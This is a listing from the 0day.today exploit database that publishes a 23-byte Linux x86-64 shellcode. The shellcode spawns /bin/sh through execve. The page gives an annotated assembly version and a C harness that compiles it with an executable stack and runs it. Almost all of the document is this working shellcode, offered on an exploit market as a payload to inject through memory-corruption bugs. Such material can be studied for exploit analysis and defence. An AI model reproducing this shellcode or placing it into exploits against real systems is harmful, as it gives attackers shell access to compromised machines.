[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

linux/x86-64 - Execve /bin/sh Shellcode Via Push - 23 bytes

Author
noviceflux
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-23634
Category
shellcode
Date add
16-05-2015
Platform
linux/x86-64
/*
    #
    # Execve /bin/sh Shellcode Via Push (Linux x86_64 23 bytes)
    #
    # Dying to be the shortest.
    #
    # Copyright (C) 2015 Gu Zhengxiong (rectigu@gmail.com)
    #
    # 27 April 2015
    #
    # GPL
    #
 
 
    .global _start
_start:
    # char *const argv[]
    xorl %esi, %esi
 
    # 'h' 's' '/' '/' 'n' 'i' 'b' '/'
    movq $0x68732f2f6e69622f, %rbx
 
    # for '\x00'
    pushq %rsi
 
    pushq %rbx
 
    pushq %rsp
    # const char *filename
    popq %rdi
 
    # __NR_execve 59
    pushq $59
    popq %rax
 
    # char *const envp[]
    xorl %edx, %edx
 
    syscall
 */
 
/*
  gcc -z execstack push64.c
 
  uname -r
  3.19.3-3-ARCH
 */
 
#include <stdio.h>
#include <string.h>
 
int
main(void)
{
  char *shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56"
    "\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05";
 
  printf("strlen(shellcode)=%d\n", strlen(shellcode));
 
  ((void (*)(void))shellcode)();
 
  return 0;
}

#  0day.today [2024-12-26]  #